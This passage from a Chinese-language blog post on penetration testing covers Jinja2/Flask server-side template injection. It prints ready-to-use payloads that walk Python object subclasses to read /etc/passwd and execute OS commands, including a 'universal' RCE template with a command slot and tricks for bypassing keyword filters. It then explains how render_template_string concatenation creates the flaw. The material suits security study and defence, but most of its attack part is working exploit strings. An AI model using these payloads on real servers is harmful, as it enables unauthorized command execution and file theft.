class="hljs-comment">#调用commands进行命令执行</span><br>&#123;&#125;.__class__.__bases__[0].__subclasses__()[59].__init__.__globals__[<span class="hljs-string">&#x27;__builtins__&#x27;</span>][<span class="hljs-string">&#x27;__import__&#x27;</span>](<span class="hljs-string">&#x27;commands&#x27;</span>).getstatusoutput(<span class="hljs-string">&#x27;ls&#x27;</span>)<br></code></pre></div></td></tr></table></figure>

<h4 id="python3"><a href="#python3" class="headerlink" title="python3"></a>python3</h4><figure class="highlight bash"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs bash"><span class="hljs-comment">#读取文件与写文件类</span><br>&#123;&#123;().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__[<span class="hljs-string">&#x27;open&#x27;</span>](<span class="hljs-string">&#x27;27/etc/passwd&#x27;</span>).<span class="hljs-built_in">read</span>()&#125;&#125;<br><span class="hljs-comment">#执行命令</span><br>&#123;&#123;().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__[<span class="hljs-string">&#x27;eval&#x27;</span>](<span class="hljs-string">&quot;__import__(&#x27;os&#x27;).popen(&#x27;id&#x27;).read()&quot;</span>)&#125;&#125;<br><span class="hljs-comment">#命令执行：</span><br>&#123;% <span class="hljs-keyword">for</span> c <span class="hljs-keyword">in</span> [].__class__.__base__.__subclasses__() %&#125;&#123;% <span class="hljs-keyword">if</span> c.__name__==<span class="hljs-string">&#x27;catch_warnings&#x27;</span> %&#125;&#123;&#123; c.__init__.__globals__[<span class="hljs-string">&#x27;__builtins__&#x27;</span>].<span class="hljs-built_in">eval</span>(<span class="hljs-string">&quot;__import__(&#x27;os&#x27;).popen(&#x27;id&#x27;).read()&quot;</span>) &#125;&#125;&#123;% endif %&#125;&#123;% endfor %&#125;<br><span class="hljs-comment">#文件操作</span><br>&#123;% <span class="hljs-keyword">for</span> c <span class="hljs-keyword">in</span> [].__class__.__base__.__subclasses__() %&#125;&#123;% <span class="hljs-keyword">if</span> c.__name__==<span class="hljs-string">&#x27;catch_warnings&#x27;</span> %&#125;&#123;&#123; c.__init__.__globals__[<span class="hljs-string">&#x27;__builtins__&#x27;</span>].open(<span class="hljs-string">&#x27;filename&#x27;</span>, <span class="hljs-string">&#x27;r&#x27;</span>).<span class="hljs-built_in">read</span>() &#125;&#125;&#123;% endif %&#125;&#123;% endfor %&#125;<br></code></pre></div></td></tr></table></figure>

<h4 id="Jinjia2通用RCE-Payload"><a href="#Jinjia2通用RCE-Payload" class="headerlink" title="Jinjia2通用RCE Payload"></a>Jinjia2通用RCE Payload</h4><figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python">&#123;% <span class="hljs-keyword">for</span> c <span class="hljs-keyword">in</span> [].__class__.__base__.__subclasses__() %&#125;&#123;% <span class="hljs-keyword">if</span> c.__name__==<span class="hljs-string">&#x27;catch_warnings&#x27;</span> %&#125;&#123;&#123; c.__init__.__globals__[<span class="hljs-string">&#x27;__builtins__&#x27;</span>].<span class="hljs-built_in">eval</span>(<span class="hljs-string">&quot;__import__(&#x27;os&#x27;).popen(&#x27;&lt;command&gt;&#x27;).read()&quot;</span>) &#125;&#125;&#123;% endif %&#125;&#123;% endfor %&#125;<br></code></pre></div></td></tr></table></figure>



<h2 id="过滤和绕过"><a href="#过滤和绕过" class="headerlink" title="过滤和绕过"></a>过滤和绕过</h2><p>没什么系统思路。就是不断挖掘类研究官方文档以及各种能够利用的姿势。这里从最简单的绕过说起。</p>
<p><strong>1.过滤[]等括号 使用gititem绕过</strong></p>
<p>原poc<code> &#123;&#123;"".__class__.__bases__[0]&#125;&#125;</code></p>
<p>绕过后<code>&#123;&#123;"".__class__.__bases__.__getitem__(0)&#125;&#125;</code></p>
<p><strong>2.过滤了subclasses，拼凑法</strong></p>
<p>原poc<code>&#123;&#123;"".__class__.__bases__[0].__subclasses__()&#125;&#125;</code></p>
<p>绕过<code>&#123;&#123;.__class__.__bases__[0].__'subcl'+'asses'__()&#125;&#125;</code></p>
<p><strong>3.过滤class 使用session</strong></p>
<p>poc <code>&#123;&#123;session['cla'+'ss'].bases[0].bases[0].bases[0].bases[0].subclasses()[118]&#125;&#125;</code></p>
<p>多个bases[0]是因为一直在向上找object类。使用mro就会很方便</p>
<p><code>&#123;&#123;session['cla'+'ss'].mro[12]&#125;&#125;</code> 或者 <code>request[&#39;cl&#39;+&#39;ass&#39;].mro[12]&#125;&#125;</code></p>
<h2 id="自动化工具"><a href="#自动化工具" class="headerlink" title="自动化工具"></a>自动化工具</h2><h3 id="SSTI测试工具–Tplmap"><a href="#SSTI测试工具–Tplmap" class="headerlink" title="SSTI测试工具–Tplmap"></a>SSTI测试工具–Tplmap</h3><p>GitHub：<a target="_blank" rel="noopener" href="https://github.com/epinna/tplmap">https://github.com/epinna/tplmap</a></p>
<hr>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><ol>
<li><strong>思考如何利用注入点执行我们想执行的语句？</strong></li>
</ol>
<ul>
<li>网站的引擎？—— 对应的模板语句、对应的语法</li>
<li>语言本身的特性及内置函数、变量、属性？—— 如python类继承</li>
<li>框架的全局变量、属性、函数 —— 如jinja </li>
<li>最后才考虑寻找应用自定义的东西 —— 这部分没有文档，是开发者自行设计的，有源码才考虑</li>
</ul>
<ol start="2">
<li><strong>SSTI执行的核心是什么？</strong></li>
</ol>
<p>​    对于flask而言，渲染函数有<code>redner_template()</code>和<code>render_template_string()</code>，前者是将数据传输到文件中进行渲染（一般为html），这是比较规范的写法。传入的参数在模板中会被html编码，从而无法再执行。而后者，是对一个字符串进行编译解析，这个字符串在渲染之前，是经过拼接的。所以会造成SSTI。</p>
<p>​    这种场景常见于当访问链接不存在时，服务器返回404，并将请求的链接url回显在页面里。如果程序员偷懒，很可能没有单独创建404.html文件，而是直接进行了拼接，于是造成了SSTI。</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-comment">## render_template_string() 实例</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">test</span>():<br>    template = <span class="hljs-string">&#x27;&#x27;&#x27;</span><br><span class="hljs-string">        &lt;div class=&quot;center-content error&quot;&gt;</span><br><span class="hljs-string">            &lt;h1&gt;Oops! That page doesn&#x27;t exist.&lt;/h1&gt;</span><br><span class="hljs-string">            &lt;h3&gt;%s&lt;/h3&gt;</span><br><span class="hljs-string">        &lt;/div&gt; </span><br><span class="hljs-string">    &#x27;&#x27;&#x27;</span> %(request.url)<br>    template_render_string(template)<br></code></pre></div></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-comment">## render_template() 实例</span><br><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&#x27;/&#x27;</span></span>)</span><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&#x27;/index&#x27;</span></span>)</span><span class="hljs-comment">#我们访问/或者/index都会跳转</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">index</span>():<br>   <span class="hljs-keyword">return</span> render_template(<span class="hljs-string">&quot;index.html&quot;</span>,title=<span class="hljs-string">&#x27;404 not fond&#x27;</span>,404url=request.url)<br><br><span class="hljs-comment">### index.html</span><br>&lt;html&gt;<br>  &lt;head&gt;<br>    &lt;title&gt;&#123;&#123;title&#125;&#125;&lt;/title&gt;<br>  &lt;/head&gt;<br> &lt;body&gt;<br>    &lt;div <span class="hljs-keyword">class</span>=<span class="hljs-string">&quot;center-content error&quot;</span>&gt;<br>         &lt;h1&gt;Oops! That page doesn<span class="hljs-string">&#x27;t exist.&lt;/h1&gt;</span><br><span class="hljs-string">         &lt;h3&gt;%s&lt;/h3&gt;</span><br><span class="hljs-string">    &lt;/div&gt; </span><br><span class="hljs-string">  &lt;/body&gt;</span><br><span class="hljs-string">&lt;/html&gt;</span><br></code></pre></div></td></tr></table></figure>

<ol start="3">
<li><strong>怎么寻找漏洞？</strong></li>
</ol>
<p>​    主要寻找<strong>输出即输入</strong>的地方，即哪里输入，哪里就有原封不动的输出，会可能存在注入的可能。同时要事先掌握网站指纹，避免模板语句的使用不当。</p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a>
                    
                      <a class="hover-with-bg" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/web%E6%94%BB%E9%98%B2/">web攻防</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a>
                    
                  </div>
                
              </div>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2022/03/29/vulhub-Mr.robot/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">vulnhub-Mr.Robot</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/03/22/hello-world/">
                        <span class="hidden-mobile">hello world</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  

  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  <script  src="/js/local-search.js" ></script>



  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  
    <script  src="https://cdn.jsdelivr.net/npm/tocbot@4/dist/tocbot.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4/anchor.min.js" ></script>
  
  
    <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js" ></script>
  






  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
        typing(title);
      
    })(window, document);
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
